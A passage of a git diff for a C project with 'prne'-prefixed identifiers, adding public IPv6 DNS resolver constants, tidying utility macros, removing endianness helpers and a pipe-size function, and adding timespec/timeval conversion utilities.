0x44 +#define PRNE_RESOLV_NS_IPV6_CLOUDFLARE_A\ + 0x26, 0x6, 0x47, 0x0, 0x47, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x11, 0x11 +#define PRNE_RESOLV_NS_IPV6_CLOUDFLARE_B\ + 0x26, 0x6, 0x47, 0x0, 0x47, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x10, 0x1 +#define PRNE_RESOLV_NS_IPV6_QUAD9_A\ + 0x26, 0x20, 0x0, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xfe +#define PRNE_RESOLV_NS_IPV6_QUAD9_B\ + 0x26, 0x20, 0x0, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x9 +#define PRNE_RESOLV_NS_IPV6_CLEANBROWSING_A\ + 0x2a, 0xd, 0x2a, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x2 +#define PRNE_RESOLV_NS_IPV6_CLEANBROWSING_B\ + 0x2a, 0xd, 0x2a, 0x0, 0x0, 0x2, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x2 +#define PRNE_RESOLV_NS_POOL_IPV6 {\ + PRNE_RESOLV_NS_IPV6_GOOGLE_A,\ + PRNE_RESOLV_NS_IPV6_GOOGLE_B,\ + PRNE_RESOLV_NS_IPV6_CLOUDFLARE_A,\ + PRNE_RESOLV_NS_IPV6_CLOUDFLARE_B,\ + PRNE_RESOLV_NS_IPV6_QUAD9_A,\ + PRNE_RESOLV_NS_IPV6_QUAD9_B,\ + PRNE_RESOLV_NS_IPV6_CLEANBROWSING_A,\ + PRNE_RESOLV_NS_IPV6_CLEANBROWSING_B\ +} + /* Default Nameserver Pools * * For testing only. Referencing these will increase the size of the binary. diff --git a/src/util_ct.h b/src/util_ct.h index 4f40949..16d4157 100644 --- a/src/util_ct.h +++ b/src/util_ct.h @@ -13,11 +13,11 @@ #define prne_op_max(a, b) ((a) > (b) ? (a) : (b)) #define prne_op_spaceship(a, b) ((a) == (b) ? 0 : (a) < (b) ? -1 : 1) -#define prne_salign_next(x, align) (((x) % align == 0) ? (x) : ((x) / align + 1) * align) -#define prne_salign_at(x, align) (((x) % align == 0) ? (x) : ((x) / align) * align) +#define prne_salign_next(x, align) (((x) % (align) == 0) ? (x) : ((x) / (align) + 1) * (align)) +#define prne_salign_at(x, align) (((x) % (align) == 0) ? (x) : ((x) / (align)) * (align)) #if !defined(memzero) -#define memzero(addr, len) memset(addr, 0, len) +#define memzero(addr, len) memset((addr), 0, (len)) #endif #ifdef PRNE_DEBUG @@ -44,69 +44,3 @@ #define prne_dbgast(expr) #define prne_dbgmast(expr, ...) #endif - -/********************************************************************** -* Endianess Independent Byte Extraction -***********************************************************************/ -/* prne_getmsbN(x, n) -* -* Extract nth most significant byte of x. -*/ -#define prne_getmsb(x, n, w, s)\ - (uint8_t)(((w)(x) & (w)0xFF << (s - 8 * (n))) >> (s - 8 * (n))) -#define prne_getmsb64(x, n) prne_getmsb((x), (n), uint_fast64_t, 56) -#define prne_getmsb32(x, n) prne_getmsb((x), (n), uint_fast32_t, 24) -#define prne_getmsb16(x, n) prne_getmsb((x), (n), uint_fast16_t, 8) - -/* prne_recmb_msbN(...) -* -* Recombine bytes in big-endian order to uintN. -*/ -#define prne_recmb_msb64(a, b, c, d, e, f, g, h) (\ - ((uint_fast64_t)(a) << 56) |\ - ((uint_fast64_t)(b) << 48) |\ - ((uint_fast64_t)(c) << 40) |\ - ((uint_fast64_t)(d) << 32) |\ - ((uint_fast64_t)(e) << 24) |\ - ((uint_fast64_t)(f) << 16) |\ - ((uint_fast64_t)(g) << 8) |\ - ((uint_fast64_t)(h) << 0)\ -) -#define prne_recmb_msb32(a, b, c, d) (\ - ((uint_fast32_t)(a) << 24) |\ - ((uint_fast32_t)(b) << 16) |\ - ((uint_fast32_t)(c) << 8) |\ - ((uint_fast32_t)(d) << 0)\ -) -#define prne_recmb_msb16(a, b) (\ - ((uint_fast16_t)(a) << 8) |\ - ((uint_fast16_t)(b) << 0)\ -) - -/* Machine Characteristics -*/ -#define PRNE_ENDIAN_LITTLE 1 -#define PRNE_ENDIAN_BIG 2 - -#ifdef __GNUC__ - #if __BYTE_ORDER__ == __ORDER_BIG_ENDIAN__ - #define PRNE_HOST_ENDIAN PRNE_ENDIAN_BIG - #elif __BYTE_ORDER__ == __ORDER_LITTLE_ENDIAN__ - #define PRNE_HOST_ENDIAN PRNE_ENDIAN_LITTLE - #else - #error "FIXME!" - #endif -#else - #error "FIXME!" -#endif - -#define prne_einv16(x) (((0xFF00 & x) >> 8) | ((0x00FF & x) << 8)) - -#if PRNE_HOST_ENDIAN == PRNE_ENDIAN_BIG -#define prne_htobe16(x) (x) -#define prne_be16toh(x) (x) -#elif PRNE_HOST_ENDIAN == PRNE_ENDIAN_LITTLE -#define prne_htobe16(x) prne_einv16(x) -#define prne_be16toh(x) prne_einv16(x) -#else -#endif diff --git a/src/util_rt.c b/src/util_rt.c index 52ea0cf..8a1e61b 100644 --- a/src/util_rt.c +++ b/src/util_rt.c @@ -44,7 +44,7 @@ void *prne_malloc (const size_t se, const size_t cnt) { if (size == 0) { return NULL; } - + return malloc(size); } @@ -73,7 +73,7 @@ void *prne_calloc (const size_t se, const size_t cnt) { if (se == 0 || cnt == 0) { return NULL; } - + return calloc(se, cnt); } @@ -281,6 +281,15 @@ double prne_real_timespec (const struct timespec ts) { return (double)ts.tv_sec + (double)ts.tv_nsec / 1000000000.0; } +struct timespec prne_ms_timespec (const long ms) { + struct timespec ret; + + ret.tv_sec = ms / 1000; + ret.tv_nsec = (ms - ret.tv_sec * 1000) * 1000000; + + return ret; +} + int prne_cmp_timespec (const struct timespec a, const struct timespec b) { if (a.tv_sec < b.tv_sec) { return -1; @@ -306,6 +315,20 @@ struct timespec prne_gettime (const clockid_t cid) { return ret; } +struct timeval prne_ts2tv (const struct timespec ts) { + struct timeval ret; + ret.tv_sec = ts.tv_sec; + ret.tv_usec = ts.tv_nsec / 1000; + return ret; +} + +struct timeval prne_ms_timeval (const long ms) { + struct timeval ret; + ret.tv_sec = ms / 1000; + ret.tv_usec = (ms - ret.tv_sec * 1000) * 1000; + return ret; +} + char *prne_enc_base64_mem (const uint8_t *data, const size_t size) { size_t ret_size; char *ret; @@ -353,16 +376,6 @@ bool prne_dec_base64_mem (const char *str, const size_t str_len, uint8_t **data, return true; } -bool prne_set_pipe_size (const int fd, const int size) { - return -#if defined(F_SETPIPE_SZ) - fcntl(fd, F_SETPIPE_SZ, size) == 0 -#elif defined(FIONREAD) - ioctl(fd, FIONREAD, &size) == 0 -#endif - ; -} - ssize_t prne_geturandom (void *buf, const size_t len) { const int fd = open("/dev/urandom", O_RDONLY); ssize_t ret; diff --git a/src/util_rt.h b/src/util_rt.h index 668a01b..a9fb39b 100644 --- a/src/util_rt.h +++ b/src/util_rt.h @@ -48,15 +48,17 @@ void prne_uuid_tostr (const uint8_t *in, char *out); struct timespec prne_sub_timespec (const struct timespec a, const struct timespec b); double prne_real_timespec (const struct timespec ts); +struct timespec prne_ms_timespec (const long ms); int prne_cmp_timespec (const struct timespec a, const struct timespec b); struct timespec prne_min_timespec (const struct timespec a, const struct timespec b); struct timespec prne_max_timespec (const struct timespec a, const struct timespec b); struct timespec prne_gettime (const clockid_t cid); +struct timeval prne_ts2tv (const struct timespec ts); +struct timeval prne_ms_timeval (const long ms); + char *prne_enc_base64_mem (const uint8_t *data, const size_t size); bool prne_dec_base64_mem (const char *str, const size_t str_len, uint8_t **data, size_t *size); -bool prne_set_pipe_size (const int fd, const int size); - // getrandom polyfill ssize_t prne_geturandom (void *buf, const size_t len); |